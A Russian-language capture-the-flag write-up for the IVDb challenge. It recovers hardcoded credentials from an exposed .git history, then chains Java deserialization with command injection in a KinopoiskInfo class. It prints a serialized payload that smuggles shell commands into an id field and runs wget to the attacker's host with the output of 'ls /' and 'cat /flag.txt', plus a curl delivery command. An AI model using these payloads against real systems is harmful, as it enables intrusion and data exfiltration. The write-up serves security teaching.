# Райтап на IVDb
### Шаг 1: авторизация
При заходе на сайт нас встречает окно http auth. В описании было сказано, что брутить бесполезно, поэтому пойдем другим путем.
Первая реакция цтфера при заходе на сайт - начать сканить файлы. Я для этого использовал dirb:
```
❯ dirb http://34.89.133.36/
---- Scanning URL: http://34.89.133.36/ ----
+ http://34.89.133.36/.git/HEAD (CODE:200|SIZE:23)
```
Сразу же находим открытый git репозиторий. Воспользуемся [скриптом](https://github.com/internetwache/GitTools/tree/master/Dumper) для дампа репозитория.

<p>
<details>
<summary>Скриншот</summary>

![gitdumper][screenshot-gitdumper]

</details>
</p>

Посмотрим, что в нем лежит. В [этой статье](https://git-scm.com/book/ru/v2/Git-изнутри-Объекты-Git) можно прочтать, как это делается.
Для начала посмотрим файлы в последнем коммите.
```
❯ git cat-file -p master^{tree}                        
100644 blob 6d602bcc60bbd69778377afebe9400f40ef83bfb    build.gradle
100644 blob 0b871a48f87632222fdfa9bb9a9b8b993557b124    settings.gradle
040000 tree ac9753556bef75a242a559ba8f1f3a5c2d7c96cb    src
```
Постепенно добираемся до исходного кода.
```
❯ git cat-file -p ac9753556bef75a242a559ba8f1f3a5c2d7c96cb
040000 tree 558be98cb9118578fbd989065024fdfb0c5bb30f    main

❯ git cat-file -p 558be98cb9118578fbd989065024fdfb0c5bb30f 
040000 tree 2d6a82884a17d04402c1258dcc1faba578b572a7    java
040000 tree e005b62f5ee8aab84a8d93f34938e05a08c210bf    resources

❯ git cat-file -p 2d6a82884a17d04402c1258dcc1faba578b572a7
040000 tree 0dd6c480e7cd16b3335263dae17d032ff17e44dc    ru

❯ git cat-file -p 0dd6c480e7cd16b3335263dae17d032ff17e44dc
040000 tree 14a433f009410469e957001a9dfb3670bcb43b6d    mctf

❯ git cat-file -p 14a433f009410469e957001a9dfb3670bcb43b6d
040000 tree 02a9827cc67b3a6e5010a23db9464efeb28578bf    movies

❯ git cat-file -p 02a9827cc67b3a6e5010a23db9464efeb28578bf
100644 blob 5fcee1e7b4311d553acbff9bad7db130e50b2f4e    MoviesDatabaseApplication.java
100644 blob 5d3ebe17b541e6e0e98e8de5a9fdc6daca200f11    StartupListener.java
040000 tree 0451192e6693e9c5e8a1240b32bd15d038f6f6f9    config
040000 tree af7eb3455ab631f5956d6a1ed9c188d2a831df15    controller
040000 tree 835642720f1c50f6e46b80dba272ecc05cb8b009    entity
040000 tree 7bd525757d033d0a7020008bc6ae457dd01509b9    repository
```
Нам нужно найти данные для авторизации, в первую очередь стоит проверить конфиги.
```
❯ git cat-file -p 0451192e6693e9c5e8a1240b32bd15d038f6f6f9
100644 blob 30d457a605a6c1b399c2e72a0bffaf200f45bc33    ApplicationConfiguration.java

❯ git cat-file -p 30d457a605a6c1b399c2e72a0bffaf200f45bc33
...
auth.inMemoryAuthentication()
         .withUser("<censored>")
         .password(passwordEncoder().encode("<censored>"))
         .authorities("ROLE_USER");
...
```
Не повезло, логин и пароль были удалены из репозитория. Но они могли остаться в старых коммитах.
```
❯ git log  
commit 40a77a5e85e0d43b6cb37f7098d0769f1dba49a2 (HEAD -> master)
Author: MCTF <admin@mctf.online>
Date:   Wed Oct 9 21:06:18 2019 +0300

    Remove sensitive info

commit c2351c2e894a1e4672c7c78c14fb171f9d74edc3
Author: MCTF <admin@mctf.online>
Date:   Wed Oct 9 21:05:49 2019 +0300

    Initial commit

❯ git cat-file -p c2351c2e894a1e4672c7c78c14fb171f9d74edc3
tree 92bbbb7d223b0dc750da7306ac1c7b8ec2490688    <---
author MCTF <admin@mctf.online> 1570644349 +0300
committer serega6531 <shk@nextbi.ru> 1570644349 +0300

Initial commit
```
Берем tree и идем по нему до найденного ранее файла.
```
❯ git cat-file -p af31bfe4369b70fabff8f0c38c80462cbad555f8
...
auth.inMemoryAuthentication()
         .withUser("masterhacker")
         .password(passwordEncoder().encode("v3rys3cur3passw0rd"))
         .authorities("ROLE_USER");
...
```
Вот и креды. Теперь мы наконец можем пройти http auth.
### Шаг 2: исследование сервиса
Открыв сайт, мы видим список фильмов, поиск и форму для добавления новых. 
<p>
<details>
<summary>Скриншот</summary>

![Главная страница][screenshot-index]

</details>
</p>

Исследовав вкладку Network, мы видим, что фильмы для главной страницы берутся через GET /movies, новые добавляются через POST /movies, поиск работает через /movies/search.
Также через /kinopoisk по id можно получить рейтинг фильма на кинопоиске, но принимаются только числа.
Никаких SQL инъекций там нет, поэтому посмотрим остальной код из репозитория.

Прочитав класс KinopoiskInfo, можно увидеть, что для получения рейтинга в toString() выполняется wget к api кинопоиска, а значит здесь может быть command injection. Но, как мы уже выяснили, подставляемый id в KinopoiskInfoController фильтруется на любые символы, кроме цифр, и таким образом выполняемую команду не изменить.

Посмотрев дальше, можно увидеть CrossServerController, который также служит для создания фильмов, но путем передачи сериализованных классов. Но автор сервиса допустил ошибку, и не вставил проверку на то, что пришел именно тот класс, который ожидается. Впрочем, оно и так упадет при попытке скастовать неправильный класс в Movie. К счастью, перед этим есть запись информации о новом объекте в лог, где при сложении строки с объектом неявно вызывается toString().

Осталось только передать сервису правильный класс и достать флаг.
### Шаг 3: создание эксплоита
Скопируем класс KinopoiskInfo, потому что нам нужно сохранить serialVersionUID одинаковым. Создадим экземпляр с тем, что должно оказаться в команде на месте id кинопоиска, и запишем в файл.

Как можно узнать, на хосте нет nc, поэтому будем отправлять через wget, который там точно есть.
```
KinopoiskInfo info = new KinopoiskInfo("843650.xml | gzip -cdf; wget http://<наш ip>:4444/a=$(ls / | tr \"\\n\" \"_\"); #");
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("exploit.bin"));
oos.writeObject(info);
oos.flush();
```
Теперь запустим `nc -lvp 4444` и отправим эксплоит
```
❯ curl -X POST --data-binary @exploit.bin -H "Content-Type: application/octet-stream" --user masterhacker:v3rys3cur3passw0rd 'http://34.89.133.36/TODO/9rmt5qluv2sidfsv/'
```
К нам в nc прилетает ответ:
```
Connection from 35.246.232.128:59658
GET /a=app.jar_bin_boot_dev_etc_flag.txt_home_lib_lib64_media_mnt_opt_proc_root_run_sbin_srv_sys_tmp_usr_var_ HTTP/1.1
```
Видим в корне файл flag.txt и читаем его.
```
KinopoiskInfo info = new KinopoiskInfo("843650.xml | gzip -cdf; wget http://<наш ip>:4444/a=$(cat /flag.txt); #");

Connection from 35.246.232.128:60394
GET /a=mctf%7Bexample_java_flag%7D HTTP/1.1
```

Флаг: mctf{example_java_flag}

[screenshot-gitdumper]: ./writeup/gitdumper.png "gitdumper"
[screenshot-index]: ./writeup/index.png "Главная страница"